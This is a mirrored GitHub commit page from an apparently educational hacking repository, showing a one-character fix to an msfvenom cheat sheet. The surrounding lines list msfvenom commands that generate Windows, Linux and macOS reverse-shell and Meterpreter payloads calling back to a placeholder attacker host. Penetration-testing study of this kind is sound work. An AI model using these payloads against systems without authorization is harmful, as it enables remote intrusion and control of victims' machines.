mirror of
https://github.com/The-Art-of-Hacking/h4cker.git
synced 2024-12-19 11:26:09 +00:00
Update msfvenom.md
This commit is contained in:
parent
14129a6d42
commit
6324f5f574
@ -7,7 +7,7 @@ MsfVenom is a Metasploit standalone payload generator as a replacement for msfpa
|
|||||||
- Creates a simple TCP Payload for Windows
|
- Creates a simple TCP Payload for Windows
|
||||||
- `msfvenom -p windows/meterpreter/reverse_http LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f exe > example.exe`
|
- `msfvenom -p windows/meterpreter/reverse_http LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f exe > example.exe`
|
||||||
- Creates a simple HTTP Payload for Windows
|
- Creates a simple HTTP Payload for Windows
|
||||||
- `msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f elf > example.elf
|
- `msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f elf > example.elf`
|
||||||
- Creates a simple TCP Shell for Linux
|
- Creates a simple TCP Shell for Linux
|
||||||
- `msfvenom -p osx/x86/shell_reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f macho > example.macho`
|
- `msfvenom -p osx/x86/shell_reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f macho > example.macho`
|
||||||
- Creates a simple TCP Shell for Mac
|
- Creates a simple TCP Shell for Mac
|
||||||
|
Loading…
Reference in New Issue
Block a user